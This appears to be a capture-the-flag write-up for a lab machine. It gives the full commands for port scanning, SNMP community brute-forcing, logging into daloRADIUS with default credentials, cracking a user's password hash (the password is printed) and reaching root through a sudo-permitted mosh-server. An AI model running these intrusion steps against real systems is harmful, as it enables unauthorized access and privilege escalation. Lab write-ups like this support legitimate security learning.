-
I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.48 -oG scan
nmap -p22,80 -sCV -Pn 10.10.11.48 -oN ports
-
After searching files and directories of the web service I can’t find anything. I decide to search for open UDP ports
nmap -p- --open --min-rate 5000 -Pn -sU 10.10.11.48 -oG scan
nmap -p161 -sUCV -Pn 10.10.11.48
-
When I find port 161 running a snmp service, I brute force to find out the commmunities and use them to run through the oids.
onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 10.10.11.48
snmpwalk -v2c -c public 10.10.11.48
-
Within the oids I find a possible hosts and add it to /etc/hosts. Then I look for information about daloradius and I find both the path to log in and the default credentials.
-
With these credentials I am able to log in and list the users. I try to crack the password hash with crackstation and get the password of the user svcMosh, underwaterfriends.
-
Thanks to these credentials I am able to log in via ssh and read the first flag
-
I list the commands that I can run as another user or with elevated permissions and I find a binary
-
After searching for information I see that I can set up a server as root and then connect to it.
sudo /usr/bin/mosh-server new -i 127.0.0.1 -p 60003
MOSH_KEY=Diw7S+M9SdRft2HnB2OGIg mosh-client 127.0.0.1 60003
-
Thanks to this, I am root and I can read the second flag.
